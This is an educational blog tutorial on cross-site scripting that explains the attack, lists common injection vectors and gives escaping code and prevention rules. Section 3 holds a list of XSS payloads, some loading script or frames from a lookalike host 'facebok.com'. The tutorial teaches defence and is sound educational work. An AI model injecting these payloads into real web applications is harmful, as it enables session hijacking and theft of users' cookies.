XSS Explained – From Theory to Practice

December 25, 2016 | Views: 3342


Hi there Cybrarians!

As always, I should thank all of you for your support. I’m really happy that my articles are helpful to most of you, and now I’m back with another article. Let’s also greet the moderators, who are doing a great job with our content on Cybrary.

I was recently asked to explain in depth how XSS attacks work, and that’s why I want to show you what XSS is, how an attacker might use it, and how a developer can protect an application from this kind of attack. This article is only for educational purposes and I won’t be responsible for any misuse. I won’t answer anything that is not within the frame “Ethical and Ethical only”.


1. What is an XSS Attack?

– Well, XSS stands for Cross-Site Scripting (the abbreviation uses an X because X as a symbol looks like a cross), and this kind of attack is injected on, and executed by, the client side (and we will see how this happens).

In other words, this kind of attack refers to a client-side code injection attack in which the attacker gets malicious scripts (commonly called “payloads”) executed in the context of a legitimate website or web application.

In this article, I will assume that you have the background knowledge of how client-server architectures work in general, so we can move straight on to XSS. In case you don’t remember what I am talking about, let me help you:

A typical web application consists of the following elements:

– The Frontend (the look of a webpage, described with HTML, CSS, JavaScript, etc.); the browser interprets this code and renders it as a visual representation.

– The Backend (the logic and functionality, written in programming languages like Java, C#, PHP, etc.).

– The Database (the store for the data kept by the application).


2. How can attackers carry out an XSS Attack?

In this scenario, we always need three actors: a hosted website, an attacker, and a victim.

As we said earlier, the attack (the payload) needs to be injected into a legitimate website. What does that mean? It means the attacker needs to find a way of using an input field to “inject” the script, so that the browser treats it as code and executes it. The attacker’s script is then delivered to the site’s visitors, and the JavaScript can change the visual representation of the page, redirect the user to another link, or collect data from your browser (usually the attacker wants the cookie), which can result in session hijacking, etc.

If the web application is vulnerable to XSS, it will deliver the malicious script to the visitor, and the visitor will be tricked into activating it. XSS attacks can be written in VBScript, ActiveX and Flash, but they are mostly written in JavaScript, because JavaScript is turned on by default in all browsers.


3. List of most used XSS Vectors

<Script> tag:

<script src=http://facebok.com/xss.js></script>

<script> alert("Boo!"); </script>

<Body> tag:

<body onload=alert("I'm evil")>

<body background="javascript:alert('So Evil')">

<Img> tag:

<img src="javascript:alert('Evil');">

<img dynsrc="javascript:alert('Bad')">

<img lowsrc="javascript:alert('So bad!')">

<Iframe> tag:

<iframe src="http://facebok.com/xss.html">

<Input> tag:

<input type="image" src="javascript:alert('Evil work');">

<Link> tag:

<link rel="stylesheet" href="javascript:alert('Evil');">

<Table> tag:

<table background="javascript:alert('Evil')">

<td background="javascript:alert('So evil')">

<Object> tag:

<object type="text/x-scriptlet" data="http://facebok.com/xss.html">

<Div> tag:

<div style="background-image: url(javascript:alert('Evil'))">


These examples are only a few of the best-known vectors; the idea was to show you how an attacker would inject a payload. As you can see, if there is a vulnerable field, the injected script is parsed as code that runs locally in your browser, and it might be used to trick you into clicking something, to collect some data, or to redirect you to a site that receives that data.
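To make the mechanics concrete, here is an added example (not code from the original article) of a minimal server-side template that reflects a user-supplied name back into the page. The vulnerable version concatenates the input straight into the HTML, so the payloads from the list above land in the document as tags; the hardened version applies the HTML escaping that rule 2 of the next section asks for, and the same payloads come out as inert text. The template, the function names (`renderGreetingVulnerable`, `renderGreetingSafe`, `countForeignTags`) and the constructed inputs are assumptions made for this example; the tag-counting check is a crude review aid, not a production sanitizer.

```javascript
// Added example (not from the original article): how a reflected payload
// travels from an input field into the rendered page, and why HTML-escaping
// stops it. Runs offline under Node.js; every input below is a constructed
// sample, not captured traffic.

// Vulnerable: untrusted input is concatenated straight into the markup, so
// the browser parses the payload as code instead of text.
function renderGreetingVulnerable(name) {
  return `<html><body><h1>Hello ${name}!</h1></body></html>`;
}

// Hardened (rule 2): the five characters that matter in HTML element content
// are replaced by entities before the value is interpolated.
function escapeHtml(untrusted) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(untrusted).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderGreetingSafe(name) {
  return `<html><body><h1>Hello ${escapeHtml(name)}!</h1></body></html>`;
}

// Payloads taken from the vector list in the article.
const PAYLOADS = [
  '<script> alert("Boo!"); </script>',
  '<body onload=alert("I\'m evil")>',
  '<img src="javascript:alert(\'Evil\');">',
];

// Crude review check: count tags in the rendered document that do not belong
// to the template itself. Anything foreign came from the untrusted input.
const TEMPLATE_TAGS = ['<html>', '<body>', '<h1>', '</h1>', '</body>', '</html>'];
function countForeignTags(html) {
  const tags = html.match(/<\/?[a-zA-Z][^>]*>/g) || [];
  return tags.filter((tag) => !TEMPLATE_TAGS.includes(tag)).length;
}

// Render one payload both ways and report how many foreign tags each output
// contains. The vulnerable rendering leaks tags; the safe one never does.
function compareRenderings(payload) {
  return {
    vulnerableForeignTags: countForeignTags(renderGreetingVulnerable(payload)),
    safeForeignTags: countForeignTags(renderGreetingSafe(payload)),
  };
}

for (const payload of PAYLOADS) {
  console.log(payload, '->', compareRenderings(payload));
}
```

Run it with `node` and compare the two counts per payload: the escaped output contains no `<` at all, which is exactly the property a code reviewer wants to see for every place untrusted data meets HTML element content.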


4. How to protect against XSS?

If you want to protect your application from XSS attacks, make sure that you follow these rules:

1. Never Insert Untrusted Data Except in Allowed Locations

2. HTML Escape Before Inserting Untrusted Data into HTML Element Content

3. Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes

4. JavaScript Escape Before Inserting Untrusted Data into JavaScript Data Values

5. HTML Escape JSON Values in an HTML Context and Read the Data with JSON.parse

6. URL Escape Before Inserting Untrusted Data into HTML URL Parameter Values

7. Sanitize HTML Markup with a Library Designed for the Job

8. Prevent DOM-based XSS

9. Use the HttpOnly Cookie Flag

10. Use an Auto-Escaping Template System and Implement Content Security Policy
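Rules 3, 4 and 6 exist because one escaper does not fit every context: a value that is harmless as element text can still close an attribute, end a JavaScript string literal, or become a whole URL. The following added example (not code from the original article) shows one escaper per context and a small template that uses the right one in each place, fed with the `<body onload=…>` payload from the vector list, whose `"` would close a double-quoted attribute and whose `'` would close a single-quoted JavaScript string. The scheme allowlist in `safeHref` is what rejects the `javascript:` URLs that dominate section 3; modern browsers no longer run them in `src` or `background` attributes, but an `href` still must not accept them. The function names, the template and the sample profile are assumptions made for this example.

```javascript
// Added example (not from the original article): context-specific escaping
// for rules 3, 4 and 6. Runs offline under Node.js; all inputs are
// constructed samples.

// Rule 3: inside a quoted attribute, encode every non-alphanumeric character
// as &#xHH; so no input can close the quote or add a new attribute. The
// attribute in the template must always be quoted for this to hold.
function escapeHtmlAttribute(untrusted) {
  return String(untrusted).replace(/[^a-zA-Z0-9]/gu,
    (ch) => `&#x${ch.codePointAt(0).toString(16).toUpperCase()};`);
}

// Rule 4: inside a JavaScript string literal, encode every non-alphanumeric
// character as \xHH, \uHHHH or \u{H...}. Because '/' is encoded too, the
// payload can never spell out a closing </script> tag.
function escapeJsString(untrusted) {
  return String(untrusted).replace(/[^a-zA-Z0-9]/gu, (ch) => {
    const cp = ch.codePointAt(0);
    if (cp < 0x100) return '\\x' + cp.toString(16).padStart(2, '0').toUpperCase();
    if (cp < 0x10000) return '\\u' + cp.toString(16).padStart(4, '0').toUpperCase();
    return `\\u{${cp.toString(16).toUpperCase()}}`;
  });
}

// Rule 6, part one: a value placed into a query string is percent-encoded.
function escapeUrlParameter(untrusted) {
  return encodeURIComponent(String(untrusted));
}

// Rule 6, part two: a value used as the whole href additionally needs a
// scheme allowlist. The URL parser lower-cases the scheme and trims leading
// whitespace, so casing and padding tricks do not get past it. Anything that
// is not http(s) is replaced by a harmless "#".
function safeHref(untrustedUrl) {
  let parsed;
  try {
    // The base only matters for relative URLs; it is a placeholder host.
    parsed = new URL(String(untrustedUrl), 'https://example.invalid/');
  } catch (err) {
    return '#';
  }
  if (!['http:', 'https:'].includes(parsed.protocol)) return '#';
  return escapeHtmlAttribute(untrustedUrl);
}

// A template that uses the right escaper for each context.
function renderProfile({ displayName, query, homepage }) {
  return [
    `<a title="${escapeHtmlAttribute(displayName)}" href="${safeHref(homepage)}">home</a>`,
    `<a href="/search?q=${escapeUrlParameter(query)}">search again</a>`,
    `<script>var displayName = '${escapeJsString(displayName)}';</script>`,
  ].join('\n');
}

// Constructed profile whose fields carry payloads from the article's list.
const SAMPLE = {
  displayName: `<body onload=alert("I'm evil")>`,
  query: '<script> alert("Boo!"); </script>',
  homepage: "javascript:alert('Evil')",
};

console.log(renderProfile(SAMPLE));
```

Read the three output lines against the inputs: the attribute holds no raw `"`, the JavaScript literal holds no raw `'`, the query string holds no `<`, and the `javascript:` homepage has become `href="#"`. Swapping the escapers between contexts is the classic mistake these rules are written to prevent.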


Feel free to read more about these topics on Google. Thank you for reading my article, and feel free to share and support.
